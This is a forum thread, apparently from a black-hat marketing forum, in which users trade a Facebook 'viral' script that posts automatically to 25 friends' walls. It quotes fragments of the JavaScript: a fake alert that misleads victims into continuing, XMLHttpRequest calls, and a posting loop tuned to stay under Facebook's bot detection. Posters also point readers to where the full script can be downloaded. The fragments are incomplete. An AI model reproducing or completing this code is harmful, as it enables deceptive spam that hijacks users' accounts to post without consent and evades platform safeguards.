Viral FBML Script Really Sick script ! ! !

Heineken

BANNED
Joined
Aug 25, 2010
Messages
306
Reaction score
46
Well i just found out this page from some dude he made some demo And here it is:

Does any one have this ?
This is fbml script and it does post to 25friends wall :O Amazing !!!

This is the demo page if anybody want to see

facebook . com/pages/Stfu-Save-The-Flying-Unicorns/330183148652
 
Kind of cool, but that is too hard for others to do, and they will see all the obfuscated, strip/replace code and bail. Even I was hesitant of doing it.

With all the tricks people can do you would think by now they could post into the address bar so they dont have to cut and paste. There is code out there to cut on click, flash for sure does it, so why not at the least, use that?

I seen the site all the is being done at along with the script.

Code:
//These are to be posted as status messages
txt = "Test Message 1";
txtee = "Test Message 2";
 
alert("Wait 15 seconds, we need to check are you liked this page. Then click OK to continue.");
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
 
I think this script is available in download section....just search there...
 
Code:
http://www.blackhatworld.com/blackhat-seo/facebook/208118-warning-outing-peoples-sites.html
 
Code:
llimit=25;
        t = setInterval(function () {
          if (i >= llimit )
            return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)
 
That's a shit page. Watch, deleted in 1 day :D
 
Back
Top